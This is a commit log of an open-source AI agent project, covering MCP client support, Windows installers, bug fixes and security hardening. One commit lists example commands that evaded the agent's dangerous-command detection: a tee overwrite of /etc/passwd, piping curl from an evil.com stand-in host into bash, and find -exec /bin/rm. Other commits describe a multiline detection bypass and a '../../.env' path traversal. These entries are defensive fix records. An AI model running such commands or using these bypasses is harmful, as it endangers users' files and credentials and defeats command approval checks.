d10108f8ca fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:21:28 +03:00
BathreeNode
8b520f9848 fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:20:47 +03:00
teknium1
4cc431afab fix: setup wizard skipping provider selection on fresh install
The is_existing check included 'get_config_path().exists()' which is
always True after installation (the installer copies config.yaml from
the template). This caused the wizard to enter quick mode, which
skips provider selection entirely — leaving hermes non-functional.

Fix: only consider it an existing installation when an actual
inference provider is configured (OPENROUTER_API_KEY, OPENAI_BASE_URL,
or an active OAuth provider). Fresh installs now correctly show the
full setup flow with provider selection.
2026-03-02 22:20:45 -08:00
BathreeNode
a718aed1be fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:20:07 +03:00
BathreeNode
5f29e7b63c fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:17:13 +03:00
teknium1
245c766512 fix: remove 2>&1 from git commands in PowerShell installer
Root cause: PowerShell with $ErrorActionPreference = 'Stop' only
creates NativeCommandError from stderr when you CAPTURE it via 2>&1.
Without the redirect, stderr flows directly to the console and
PowerShell never intercepts it.

This is how OpenClaw's install.ps1 handles it — bare git commands
with no stderr redirection. Wrap SSH clone attempt in try/catch
since it's expected to fail (falls back to HTTPS).
2026-03-02 22:14:18 -08:00
BathreeNode
f08ad94d4d fix: correct typo 'Grup' -> 'Group' in test section headers
Three section header comments in tests/test_run_agent.py used
'Grup' instead of 'Group':

- Line 124: # Grup 1: Pure Functions
- Line 276: # Grup 2: State / Structure Methods
- Line 572: # Grup 3: Conversation Loop Pieces (OpenAI mock)
2026-03-03 09:10:35 +03:00
teknium1
cdf5375b9a fix: PowerShell NativeCommandError on git stderr output
PowerShell with $ErrorActionPreference = 'Stop' treats ANY stderr
output from native commands as a terminating NativeCommandError —
even successful git operations that write progress to stderr
(e.g. 'Cloning into ...').

Fix: temporarily set $ErrorActionPreference = 'Continue' around all
git commands (clone, fetch, checkout, pull, submodule update). This
lets git run normally while preserving strict error handling for
the rest of the installer.
2026-03-02 22:10:31 -08:00
teknium1
bdf4758510 fix: show uv error on Python install failure, add fallback detection
The Windows installer was swallowing uv python install errors with
| Out-Null, making failures impossible to diagnose. Now:

- Shows the actual uv error output when installation fails
- Falls back to finding any existing Python 3.10-3.13 on the system
- Falls back to system python if available
- Shows helpful manual install instructions (python.org URL + winget)
2026-03-02 22:06:26 -08:00
teknium1
84e45b5c40 feat: tabbed platform installer on landing page
Add an interactive OS selector widget to the hero section and install
steps, inspired by OpenClaw's install UI:

- macOS-style window chrome with red/yellow/green dots
- Three clickable tabs: Linux/macOS, PowerShell, CMD
- Command text, shell prompt, and note update on tab click
- Auto-detects visitor's OS and selects the right tab on page load
- Install steps section also gets synced platform tabs
- Simplified Windows note section (tabs above now cover all platforms)
- Fully responsive — icons hidden on mobile, tabs wrap properly
2026-03-02 22:03:43 -08:00
teknium1
daedec6957 fix: Telegram adapter crash on Windows when library not installed (#304)
The ImportError fallback set ContextTypes = Any, but then
ContextTypes.DEFAULT_TYPE was used as a type annotation at class
definition time — Any doesn't have .DEFAULT_TYPE, causing AttributeError.

Fix: create a _MockContextTypes class with DEFAULT_TYPE = Any.
Also stub CommandHandler, TelegramMessageHandler, filters, ParseMode,
and ChatType to prevent potential NameErrors.

Fixes #304.
2026-03-02 22:03:36 -08:00
teknium1
de59d91add feat: Windows native support via Git Bash
- Add scripts/install.cmd batch wrapper for CMD users (delegates to install.ps1)
- Add _find_shell() in local.py: detects Git Bash on Windows via
  HERMES_GIT_BASH_PATH env var, shutil.which, or common install paths
  (same pattern as Claude Code's CLAUDE_CODE_GIT_BASH_PATH)
- Use _find_shell() in process_registry.py for background processes
- Fix hermes_cli/gateway.py: use wmic instead of ps aux on Windows,
  skip SIGKILL (doesn't exist on Windows), fix venv path
  (Scripts/python.exe vs bin/python)
- Update README with three install commands (Linux/macOS, PowerShell, CMD)
  and Windows native documentation

Requires Git for Windows, which bundles bash.exe. The terminal tool
transparently uses Git Bash for shell commands regardless of whether
the user launched hermes from PowerShell or CMD.
2026-03-02 22:03:29 -08:00
Teknium
68cc81a74d Merge pull request #301 from NousResearch/feat/mcp-support
feat(mcp): Native MCP client with HTTP transport, reconnection, and security
2026-03-02 21:32:43 -08:00
teknium1
3ead3401e0 fix(mcp): persist updated tools to session log immediately after reload
After /reload-mcp updates self.agent.tools, immediately call
_persist_session() so the session JSON file at ~/.hermes/sessions/
reflects the new tools list. Without this, the tools field in the
session log would only update on the next conversation turn — if
the user quit after reloading, the log would have stale tools.
2026-03-02 21:31:23 -08:00
teknium1
eec31b0089 fix(mcp): /reload-mcp now updates agent tools + injects history message
- CLI: After reload, refreshes self.agent.tools and valid_tool_names
  so the model sees updated tools on its next API call
- Both CLI and Gateway: Appends a [SYSTEM: ...] message at the END
  of conversation history explaining what changed (added/removed/
  reconnected servers, tool count). This preserves prompt-cache for
  the system prompt and earlier messages — only the tail changes.
- Gateway already creates a new AIAgent per message so tools refresh
  naturally; the injected message provides context for the model
2026-03-02 19:25:06 -08:00
teknium1
7df14227a9 feat(mcp): banner integration, /reload-mcp command, resources & prompts
Banner integration:
- MCP Servers section in CLI startup banner between Tools and Skills
- Shows each server with transport type, tool count, connection status
- Failed servers shown in red; section hidden when no MCP configured
- Summary line includes MCP server count
- Removed raw print() calls from discovery (banner handles display)

/reload-mcp command:
- New slash command in both CLI and gateway
- Disconnects all MCP servers, re-reads config.yaml, reconnects
- Reports what changed (added/removed/reconnected servers)
- Allows adding/removing MCP servers without restarting

Resources & Prompts support:
- 4 utility tools registered per server: list_resources, read_resource,
  list_prompts, get_prompt
- Exposes MCP Resources (data sources) and Prompts (templates) as tools
- Proper parameter schemas (uri for read_resource, name for get_prompt)
- Handles text and binary resource content
- 23 new tests covering schemas, handlers, and registration

Test coverage: 74 MCP tests total, 1186 tests pass overall.
2026-03-02 19:15:59 -08:00
teknium1
60effcfc44 fix(mcp): parallel discovery, user-visible logging, config validation
- Discovery is now parallel (asyncio.gather) instead of sequential,
  fixing the 60s shared timeout issue with multiple servers
- Startup messages use print() so users see connection status even
  with default log levels (the 'tools' logger is set to ERROR)
- Summary line shows total tools and failed servers count
- Validate conflicting config: warn if both 'url' and 'command' are
  present (HTTP takes precedence)
- Update TODO.md: mark MCP as implemented, list remaining work
- Add test for conflicting config detection (51 tests total)

All 1163 tests pass.
2026-03-02 19:02:28 -08:00
teknium1
63f5e14c69 docs: add comprehensive MCP documentation and examples
- docs/mcp.md: Full MCP documentation covering prerequisites, configuration,
  transports (stdio + HTTP), security (env filtering, credential stripping),
  reconnection, troubleshooting, popular servers, and advanced usage
- README.md: Add MCP section with quick config example and install instructions
- cli-config.yaml.example: Add commented mcp_servers section with examples
  for stdio, HTTP, and authenticated server configs
- docs/tools.md: Add MCP to Tool Categories table and MCP Tools section
- skills/mcp/native-mcp/SKILL.md: Create native MCP client skill with
  full configuration reference, transport types, security, troubleshooting
- skills/mcp/DESCRIPTION.md: Update category description to cover both
  native MCP client and mcporter bridge approaches
2026-03-02 18:52:33 -08:00
teknium1
64ff8f065b feat(mcp): add HTTP transport, reconnection, security hardening
Upgrades the MCP client implementation from PR #291 with:

- HTTP/Streamable HTTP transport: support 'url' key in config for remote
  MCP servers (Notion, Slack, Sentry, Supabase, etc.)
- Automatic reconnection with exponential backoff (1s-60s, 5 retries)
  when a server connection drops unexpectedly
- Environment variable filtering: only pass safe vars (PATH, HOME, etc.)
  plus user-specified env to stdio subprocesses (prevents secret leaks)
- Credential stripping: sanitize error messages before returning to the
  LLM (strips GitHub PATs, OpenAI keys, Bearer tokens, etc.)
- Configurable per-server timeouts: 'timeout' and 'connect_timeout' keys
- Fix shutdown race condition in servers_snapshot variable scoping

Test coverage: 50 tests (up from 30), including new tests for env
filtering, credential sanitization, HTTP config detection, reconnection
logic, and configurable timeouts.

All 1162 tests pass (1162 passed, 3 skipped, 0 failed).
2026-03-02 18:40:03 -08:00
teknium1
468b7fdbad Merge PR #291: feat: add MCP (Model Context Protocol) client support
Authored by 0xbyt4. Adds MCP client with official SDK, direct tool registration,
auto-injection into hermes-* toolsets, and graceful degradation.
2026-03-02 18:24:31 -08:00
teknium1
14b0ad95c6 docs: enhance WhatsApp setup instructions and introduce mode selection
Updated the README and messaging documentation to clarify the two modes for WhatsApp integration: 'bot' mode (recommended) and 'self-chat' mode. Improved setup instructions to guide users through the configuration process, including allowlist management and dependency installation. Adjusted CLI commands to reflect these changes and ensure a smoother user experience. Additionally, modified the WhatsApp bridge to support the new mode functionality.
2026-03-02 17:51:33 -08:00
teknium1
221e4228ec Merge PR #295: fix: resolve OPENROUTER_API_KEY before OPENAI_API_KEY in all code paths
Authored by 0xbyt4. Fixes #289.
2026-03-02 17:29:25 -08:00
teknium1
dd9d3f89b9 Merge PR #286: Fix ClawHub Skills Hub adapter for API endpoint changes
Authored by BP602. Fixes #285.
2026-03-02 17:25:14 -08:00
teknium1
b0cce17da6 Merge PR #284: fix(cli): throttle UI invalidate to prevent terminal blinking on SSH
Authored by ygd58. Fixes #282.
2026-03-02 17:17:54 -08:00
teknium1
c6b3b8c847 docs: add VISION.md brainstorming/roadmap doc
Initial vision board with voice mode feature exploration, CLI UX design,
gateway platform ideas, and open questions.
2026-03-02 17:15:30 -08:00
teknium1
2ba87a10b0 Merge PR #219: fix: guard POSIX-only process functions for Windows compatibility
Authored by Farukest. Fixes #218.
2026-03-02 17:07:49 -08:00
aydnOktay
5fa3e24b76 Make process_registry checkpoint writes atomic 2026-03-03 02:44:01 +03:00
aydnOktay
ac6d747fa6 Make batch_runner checkpoint incremental and atomic 2026-03-03 01:43:07 +03:00
alireza78a
ee541c84f1 fix(cron): close lock_fd on failed flock to prevent fd leak 2026-03-03 02:09:56 +03:30
0xbyt4
6053236158 fix: prioritize OPENROUTER_API_KEY over OPENAI_API_KEY
When both OPENROUTER_API_KEY and OPENAI_API_KEY are set (e.g. OPENAI_API_KEY
in .bashrc), the wrong key was sent to OpenRouter causing auth failures.

Fixed key resolution order in cli.py and runtime_provider.py.

Fixes #289
2026-03-03 00:28:26 +03:00
0xbyt4
11615014a4 fix: eliminate shell noise from terminal output with fence markers
- Wrap commands with unique fence markers (printf FENCE; cmd; printf FENCE)
  to isolate real output from shell init/exit noise (oh-my-zsh, macOS
  session restore/save, docker plugin errors, etc.)
- Expand _clean_shell_noise to cover zsh/macOS patterns and strip from
  both beginning and end (fallback when fences are missing)
- Fix BSD find compatibility: fallback to simple find when -printf
  produces empty output (macOS)
- Fix test_terminal_disk_usage: use sys.modules to get the real module
  instead of the shadowed function from tools/__init__.py
- Add 13 new unit tests for fence extraction and zsh noise patterns
2026-03-02 22:53:21 +03:00
Daniel Sateler
3588396263 feat(whatsapp): native media sending — images, videos, documents
Add a /send-media endpoint to the WhatsApp bridge and corresponding
adapter methods so the agent can send files as native WhatsApp
attachments instead of plain-text URLs/paths.

- bridge.js: new POST /send-media endpoint using Baileys' native
  image/video/document/audio message types with MIME detection
- base.py: add send_video(), send_document(), send_image_file()
  with text fallbacks; route MEDIA: tags by file extension instead
  of always treating them as voice messages
- whatsapp.py: implement all media methods via a shared
  _send_media_to_bridge() helper; override send_image() to download
  URLs to local cache and send as native photos
- prompt_builder.py: update WhatsApp and Telegram platform hints so
  the agent knows it can use MEDIA:/path tags to send native media
2026-03-02 16:34:49 -03:00
0xbyt4
11a2ecb936 fix: resolve thread safety issues and shutdown deadlock in MCP client
- Add threading.Lock protecting all shared state (_servers, _mcp_loop, _mcp_thread)
- Fix deadlock in shutdown_mcp_servers: _stop_mcp_loop was called inside
  a _lock block but also acquires _lock (non-reentrant)
- Fix race condition in _ensure_mcp_loop with concurrent callers
- Change idempotency to per-server (retry failed servers, skip connected)
- Dynamic toolset injection via startswith("hermes-") instead of hardcoded list
- Parallel shutdown via asyncio.gather instead of sequential loop
- Add tests for partial failure retry, parallel shutdown, dynamic injection
2026-03-02 22:08:32 +03:00
0xbyt4
151e8d896c fix(tests): isolate discover_mcp_tools tests from global _servers state
Patch _servers to empty dict in tests that call discover_mcp_tools()
with mocked config, preventing interference from real MCP connections
that may exist when running within the full test suite.
2026-03-02 21:38:01 +03:00
0xbyt4
593c549bc4 fix: make discover_mcp_tools idempotent to prevent duplicate connections
When discover_mcp_tools() is called multiple times (e.g. direct call
then model_tools import), return existing tool names instead of opening
new connections that would orphan the previous ones.
2026-03-02 21:34:21 +03:00
0xbyt4
aa2ecaef29 fix: resolve orphan subprocess leak on MCP server shutdown
Refactor MCP connections from AsyncExitStack to task-per-server
architecture. Each server now runs as a long-lived asyncio Task
with `async with stdio_client(...)`, ensuring anyio cancel-scope
cleanup happens in the same Task that opened the connection.
2026-03-02 21:22:00 +03:00
0xbyt4
0eb0bec74c feat(gateway): add MCP server shutdown on gateway exit
Ensures MCP subprocess connections are closed when the messaging
gateway shuts down, preventing orphan processes.
2026-03-02 21:06:17 +03:00
0xbyt4
3c252ae44b feat: add MCP (Model Context Protocol) client support
Connect to external MCP servers via stdio transport, discover their tools
at startup, and register them into the hermes-agent tool registry.

- New tools/mcp_tool.py: config loading, server connection via background
  event loop, tool handler factories, discovery, and graceful shutdown
- model_tools.py: trigger MCP discovery after built-in tool imports
- cli.py: call shutdown_mcp_servers in _run_cleanup
- pyproject.toml: add mcp>=1.2.0 as optional dependency
- 27 unit tests covering config, schema conversion, handlers, registration,
  SDK interaction, toolset injection, graceful fallback, and shutdown

Config format (in ~/.hermes/config.yaml):
  mcp_servers:
    filesystem:
      command: "npx"
      args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp"]
2026-03-02 21:03:14 +03:00
BP602
6789084ec0 Fix ClawHub Skills Hub adapter for updated API 2026-03-02 16:11:49 +01:00
ygd58
b603b6e1c9 fix(cli): throttle UI invalidate to prevent terminal blinking on SSH 2026-03-02 16:00:12 +01:00
teknium1
3c13feed4c feat: show detailed tool call args in gateway based on config
Issue #263: Telegram/Discord/WhatsApp/Slack now show tool call details
based on display.tool_progress in config.yaml.

Changes:
- gateway/run.py: 'verbose' mode shows full args (keys + JSON, 200 char
  max). 'all' mode preview increased from 40 to 80 chars. Added missing
  tool emojis (execute_code, delegate_task, clarify, skill_manage,
  search_files).
- agent/display.py: Added execute_code, delegate_task, clarify,
  skill_manage to primary_args. Added 'code' and 'goal' to fallback keys.
- run_agent.py: Pass function_args dict to tool_progress_callback so
  gateway can format based on its own verbosity config.

Config usage:
  display:
    tool_progress: verbose  # off | new | all | verbose
2026-03-02 05:23:15 -08:00
teknium1
7652afb8de Merge PR #243: fix(honcho): auto-enable when API key is present
Authored by Bartok9. Fixes #241.
2026-03-02 05:13:33 -08:00
teknium1
7862e7010c test: add additional multiline bypass tests for find patterns
Extra test coverage for newline bypass detection (DOTALL fix).
Inspired by Bartok9's PR #245.
2026-03-02 04:46:27 -08:00
teknium1
4faf2a6cf4 Merge PR #233: fix(security): add re.DOTALL to prevent multiline bypass of dangerous command detection
Authored by Farukest. Fixes #232.
2026-03-02 04:44:06 -08:00
teknium1
8c48bb080f refactor: remove unnecessary single-element loop in disk usage calc
The 'for pattern in [f"hermes-*{task_id[:8]}*"]' was a loop over a
single-element list — just use a plain variable instead.
2026-03-02 04:40:13 -08:00
teknium1
6d2481ee5c Merge PR #231: fix: use task-specific glob pattern in disk usage calculation
Authored by Farukest. Fixes #230.
2026-03-02 04:38:58 -08:00
teknium1
ca5525bcd7 fix(tests): isolate HERMES_HOME in tests and adjust log directory for debug session
Added a fixture to redirect HERMES_HOME to a temporary directory during tests, preventing writes to the user's home directory. Updated the test for DebugSession to create a dedicated log directory for saving logs, ensuring test isolation and accuracy in assertions.
2026-03-02 04:34:21 -08:00
teknium1
56b53bff6e Merge PR #229: fix(agent): copy conversation_history to avoid mutating caller's list
Authored by Farukest. Fixes #228.

# Conflicts:
#	tests/test_run_agent.py
2026-03-02 04:21:39 -08:00
Dogila Developer
fd335a4e26 fix: add missing dangerous command patterns in approval.py
Three attack vectors bypassed the dangerous command detection system:

1. tee writes to sensitive paths (/etc/, /dev/sd, .ssh/, .hermes/.env)
were not detected. tee writes to files just like > but was absent
from DANGEROUS_PATTERNS.
Example: echo 'evil' | tee /etc/passwd

2. curl/wget via process substitution bypassed the pipe-to-shell check.
The existing pattern only matched curl ... | bash but not
bash <(curl ...) which is equally dangerous.
Example: bash <(curl http://evil.com/install.sh)

3. find -exec with full-path rm (e.g. /bin/rm, /usr/bin/rm) was not
caught. The pattern only matched bare rm, not absolute paths.
Example: find . -exec /bin/rm {} \;
2026-03-02 14:46:20 +03:00
teknium1
c4ea996612 fix: repair flush sentinel test — mock auxiliary client and add guard
The TestFlushSentinelNotLeaked test from PR #227 had two issues:
1. flush_memories() uses get_text_auxiliary_client() which could bypass
   agent.client entirely — mock it to return (None, None)
2. No assertion that the API was actually called — added guard assert

Without these fixes the test passed vacuously (API never called).
2026-03-02 03:21:08 -08:00
teknium1
39bfd226b8 Merge PR #225: fix: preserve empty content in ReadResult.to_dict()
Authored by Farukest. Fixes #224.
2026-03-02 03:13:31 -08:00
teknium1
234b67f5fd fix: mock time in retry exhaustion tests to prevent backoff sleep
The TestRetryExhaustion tests from PR #223 didn't mock time.sleep/time.time,
causing the retry backoff loops (275s+ total) to run in real time. Tests would
time out instead of running quickly.

Added _make_fast_time_mock() helper that creates a mock time module where
time.time() advances 500s per call (so sleep_end is always in the past) and
time.sleep() is a no-op. Both tests now complete in <1s.
2026-03-02 02:59:41 -08:00
teknium1
e27e3a4f8a Merge PR #223: fix: correct off-by-one in retry exhaustion checks
Authored by Farukest. Fixes #222.
2026-03-02 02:54:10 -08:00
teknium1
7a11ff95a9 Merge PR #277: fix: handle None message content across codebase
Fixes #276. Replace msg.get('content', '') with msg.get('content') or ''
in 4 vulnerable message-processing paths.
2026-03-02 02:42:35 -08:00
teknium1
33ab5cec82 fix: handle None message content across codebase (fixes #276)
The OpenAI API returns content: null on assistant messages with tool
calls. msg.get('content', '') returns None when the key exists with
value None, causing TypeError on len(), string concatenation, and
.strip() in downstream code paths.

Fixed 4 locations that process conversation messages:
- agent/auxiliary_client.py:84 — None passed to API calls
- cli.py:1288 — crash on content[:200] and len(content)
- run_agent.py:3444 — crash on None.strip()
- honcho_integration/session.py:445 — 'None' rendered in transcript

13 other instances were verified safe (already protected, only process
user/tool messages, or use the safe pattern).

Pattern: msg.get('content', '') → msg.get('content') or ''

Fixes #276
2026-03-02 02:23:53 -08:00
teknium1
1cb2311bad fix(security): block path traversal in skill_view file_path (fixes #220)
skill_view accepted arbitrary file_path values like '../../.env' and
would read files outside the skill directory, exposing API keys and
other sensitive data.

Added two layers of defense:
1. Reject paths with '..' components (fast, catches obvious traversal)
2. resolve() containment check with trailing '/' to prevent prefix
   collisions (catches symlinks and edge cases)

Fix approach from PR #242 (@Bartok9). Vulnerability reported by
@Farukest (#220, PR #221). Tests rewritten to properly mock SKILLS_DIR.

Closes #220
2026-03-02 02:00:09 -08:00
teknium1
25c65bc99e fix(agent): handle None content in context compressor (fixes #211)
The OpenAI API returns content: null on assistant messages that only
contain tool calls. msg.get('content', '') returns None (not '') when
the key exists with value None, causing TypeError on len() and string
concatenation in _generate_summary and compress.

Fix: msg.get('content') or '' — handles both missing keys and None.

Tests from PR #216 (@Farukest). Fix also in PR #215 (@cutepawss).
Both PRs had stale branches and couldn't be merged directly.

Closes #211
2026-03-02 01:35:52 -08:00
teknium1
afb680b50d fix(cli): fix max_turns comment and test for correct priority order
Priority is: CLI arg > config file > env var > default
(not env var > config file as the old comment stated)

The test failed because config.yaml had max_turns at both root level
and inside agent section. The test cleared agent.max_turns but the
root-level value still took precedence over the env var. Fixed the
test to clear both, and corrected the comment to match the intended
priority order.
2026-03-02 01:18:52 -08:00
BathreeNode
c574a4d086 fix(batch_runner): log traceback when worker raises during imap_unordered
If any worker raises inside pool.imap_unordered(), the exception
propagates through the for loop and the results list is left
incomplete. The finally block correctly restores the log level but
the error is swallowed with no diagnostic information.

Added an explicit except block that logs the full traceback via
exc_info=True before re-raising, making batch worker failures
visible in logs without changing the existing control flow.
2026-03-02 12:16:07 +03:00
BathreeNode
bd8b20b933 Merge branch 'NousResearch:main' into main 2026-03-02 12:14:34 +03:00
teknium1
866fd9476b fix(docker): remove --read-only and allow exec on /tmp for package installs
The Docker sandbox previously used --read-only on the root filesystem and
noexec on /tmp. This broke 30+ skills that need to install packages:
- npm install -g (codex, claude-code, mcporter, powerpoint)
- pip install (20+ mlops/media/productivity skills)
- apt install (minecraft-modpack-server, ml-paper-writing)
- Build tools that compile in /tmp (pip wheels, node-gyp)

The container is already fully isolated from the host. Industry standard
(E2B, Docker Sandboxes, OpenAI Codex) does not use --read-only — the
container itself is the security boundary.

Retained security hardening:
- --cap-drop ALL (zero capabilities)
- --security-opt no-new-privileges (no escalation)
- --pids-limit 256 (no fork bombs)
- Size-limited tmpfs for /tmp, /var/tmp, /run
- nosuid on all tmpfs mounts
- noexec on /var/tmp and /run (rarely need exec there)
- Resource limits (CPU, memory, disk)
- Ephemeral containers (destroyed after use)

Fixes #189.
2026-03-02 01:09:34 -08:00
BathreeNode
d2ec5aaacf fix(registry): preserve full traceback on tool dispatch errors
logger.error() only records the exception message string, silently
discarding the stack trace. Switch to logger.exception() which
automatically appends the full traceback to the log output.

Without this change, when a tool handler raises an unexpected error
the log shows only the exception type and message, making it
impossible to determine which line caused the failure or trace
through nested calls.
2026-03-02 11:57:47 +03:00
teknium1
e265006fd6 test: add coverage for chat_topic in SessionSource and session context prompt
Tests added:
- Roundtrip serialization of chat_topic via to_dict/from_dict
- chat_topic defaults to None when missing from dict
- Channel Topic line appears in session context prompt when set
- Channel Topic line is omitted when chat_topic is None

Follow-up to PR #248 (feat: Discord channel topic in session context).
2026-03-02 00:53:21 -08:00
Josh Black-Star
b1bf11b0fe fix(setup): handle TerminalMenu init failures with safe fallback 2026-03-02 00:52:27 -08:00
teknium1
6bf3aad62e fix(delegate_tool): update max_iterations in documentation and example config to reflect default value of 50 2026-03-02 00:52:01 -08:00
teknium1
3a840a130c Merge PR #248: feat(gateway): include Discord channel topic in session context
Authored by Bartok9. Fixes #163.

Surfaces Discord channel topics in the agent's session context prompt,
allowing the agent to adapt its behavior based on the channel's purpose.
2026-03-02 00:51:20 -08:00
teknium1
14396e3fe7 fix(delegate_tool): update max_iterations default from 25 to 50 for improved task handling 2026-03-02 00:51:10 -08:00
teknium1
1ad930cbd0 fix(delegate_tool): increase DEFAULT_MAX_ITERATIONS from 25 to 50 to enhance processing capabilities 2026-03-02 00:51:01 -08:00
Sertug17
7a0b37712f fix(agent): strip finish_reason from assistant messages to fix Mistral 422 errors (#253)
* fix(agent): skip reasoning param for Mistral API to prevent 422 errors

* fix(agent): strip finish_reason from assistant messages to fix Mistral 422 errors
2026-03-02 00:35:03 -08:00
teknium1
e2b8740fcf fix: load_cli_config() now carries over non-default config keys
load_cli_config() only merged keys present in its hardcoded defaults
dict, silently dropping user-added keys like platform_toolsets (saved
by 'hermes tools'), provider_routing, memory, honcho, etc.

Added a second pass to carry over all file_config keys that aren't in
defaults, so 'hermes tools' changes actually take effect in CLI mode.

The gateway was unaffected (reads YAML directly via yaml.safe_load).
2026-03-02 00:32:28 -08:00
teknium1
45d132d098 fix(agent): remove preview truncation in assistant message output
Updated the AIAgent class to print the full content of assistant messages without truncation, enhancing visibility of the messages during runtime. This change improves the clarity of communication from the agent.
2026-03-02 00:32:06 -08:00
teknium1
719f2eef32 Merge branch 'pr-217'
# Conflicts:
#	gateway/session.py
2026-03-02 00:18:41 -08:00
teknium1
698b35933e fix: /retry, /undo, /compress, and /reset gateway commands (#210)
- /retry, /undo, /compress were setting a non-existent conversation_history
  attribute on SessionEntry (a @dataclass with no such field). The dangling
  attribute was silently created but never read — transcript was reloaded
  from DB on next interaction, making all three commands no-ops.

- /reset accessed self.session_store._sessions (non-existent) instead of
  self.session_store._entries, causing AttributeError caught by a bare
  except, silently skipping the pre-reset memory flush.

Fix:
- Add SessionDB.clear_messages() to delete messages and reset counters
- Add SessionStore.rewrite_transcript() to atomically replace transcript
  in both SQLite and legacy JSONL storage
- Replace all dangling attr assignments with rewrite_transcript() calls
- Fix _sessions → _entries in /reset handler

Closes #210
2026-03-02 00:14:49 -08:00
teknium1
0512ada793 feat(agent): include tools in agent status output
Added the tools attribute to the AIAgent class's status output, ensuring that the current tools used by the agent are included in the status information. This enhancement improves the visibility of the agent's capabilities during runtime.
2026-03-02 00:13:41 -08:00
teknium1
47289ba6f1 feat(agent): include system prompt in agent status output
Added the system prompt to the AIAgent class's status output, ensuring that the current system prompt is included in the agent's status information. This enhancement improves visibility into the agent's configuration during runtime.
2026-03-01 23:50:54 -08:00
Robin Fernandes
5e5e0efc60 Fix nous refresh token rotation failure in case where api key mint/retrieval fails 2026-03-02 17:18:15 +11:00
teknium1
7b38afc179 fix(auth): handle session expiration and re-authentication in Nous Portal
Enhanced error handling in the _model_flow_nous function to detect session expiration and prompt for re-authentication with the Nous Portal. Added logic to manage re-login attempts and provide user feedback on success or failure, improving the overall user experience during authentication issues.
2026-03-01 20:20:30 -08:00
teknium1
e5893075f9 feat(agent): add summary handling for reasoning items
Enhanced the AIAgent class to capture and normalize summary information for reasoning items. Implemented logic to handle summaries as lists, ensuring proper formatting for API interactions. Updated tests to validate the inclusion of summaries in reasoning items, both for existing and default cases.
2026-03-01 20:03:03 -08:00
teknium1
5e598a588f refactor(auth): transition Codex OAuth tokens to Hermes auth store
Updated the authentication mechanism to store Codex OAuth tokens in the Hermes auth store located at ~/.hermes/auth.json instead of the previous ~/.codex/auth.json. This change includes refactoring related functions for reading and saving tokens, ensuring better management of authentication states and preventing conflicts between different applications. Adjusted tests to reflect the new storage structure and improved error handling for missing or malformed tokens.
2026-03-01 19:59:24 -08:00
Aayush Chaudhary
c2d8d17285 feat(skills): add DuckDuckGo search skill as Firecrawl fallback 2026-03-02 09:08:59 +05:30
teknium1
8bc2de4ab6 feat(provider-routing): add OpenRouter provider routing configuration
Introduced a new `provider_routing` section in the CLI configuration to control how requests are routed across providers when using OpenRouter. This includes options for sorting providers by throughput, latency, or price, as well as allowing or ignoring specific providers, setting the order of provider attempts, and managing data collection policies. Updated relevant classes and documentation to support these features, enhancing flexibility in provider selection.
2026-03-01 18:24:27 -08:00
teknium1
75a92a3f82 refactor(cli): improve header formatting and description truncation
Updated the CLI header formatting for tool and configuration displays to center titles within their respective widths. Enhanced the display of command descriptions to include an ellipsis for longer texts, ensuring better readability. This refactor improves the overall user interface of the CLI.
2026-03-01 16:37:16 -08:00
teknium1
72963e9ccb fix(install): prevent interactive prompts during non-interactive installs
Updated the install.sh script to set DEBIAN_FRONTEND and NEEDRESTART_MODE environment variables for non-interactive package installations on Ubuntu and Debian. This change ensures that prompts from needrestart and whiptail do not block the installation process, improving automation for system package installations.
2026-03-01 16:18:35 -08:00
teknium1
92da8e7e62 feat(agent): enhance reasoning handling and configuration
Added support for processing encrypted reasoning content within the AIAgent class. Introduced logic to determine reasoning effort and enable/disable reasoning based on configuration settings. Updated the kwargs to reflect these changes, ensuring proper handling of reasoning parameters during agent execution.
2026-03-01 16:15:20 -08:00
teknium1
c84d5ce738 refactor(terminal_tool): clarify foreground and background process usage
Updated documentation within terminal_tool.py to emphasize the appropriate use of foreground and background processes. Enhanced descriptions for the timeout setting and background execution to guide users towards optimal configurations for scripts, builds, and long-running tasks. Adjusted the default timeout value from 60 to 180 seconds for improved handling of longer operations.
2026-03-01 16:15:05 -08:00
teknium1
dda9f3e734 fix(process_registry): ensure unbuffered output for subprocesses
Updated the environment variables for subprocess execution in the ProcessRegistry class to set PYTHONUNBUFFERED to "1". This change ensures that output from Python scripts is unbuffered, allowing for real-time visibility of progress during background execution. Adjusted both the pty and background process spawning methods to use the new environment configuration.
2026-03-01 16:14:57 -08:00
teknium1
834e25a662 feat(batch_runner): enhance prompt processing with optional container image support
Updated the _process_single_prompt function to accept an optional 'image' field in prompt_data, allowing for per-prompt container image overrides. Implemented checks for Docker image accessibility and added logic to register task environment overrides for Docker, Modal, and Singularity. This improves flexibility in managing containerized environments for prompt execution.
2026-03-01 16:14:36 -08:00
aydnOktay
196a13f3dc Improve error handling and validation in transcription_tools 2026-03-02 01:53:18 +03:00
aydnOktay
440d33eec4 Improve error handling and type hints in session_search_tool 2026-03-02 01:50:37 +03:00
teknium1
11f5c1ecf0 fix(tests): use bare @pytest.mark.asyncio for hook emit tests
Remove loop_scope="function" parameter from async test decorators in
test_hooks.py. This matches the existing convention in the repo
(test_telegram_documents.py) and avoids requiring pytest-asyncio 0.23+.

All 144 new tests from PR #191 now pass.
2026-03-01 05:28:55 -08:00
0xbyt4
3b745633e4 test: add unit tests for 8 untested modules (batch 3) (#191)
* test: add unit tests for 8 untested modules (batch 3)

New test files (143 tests total):
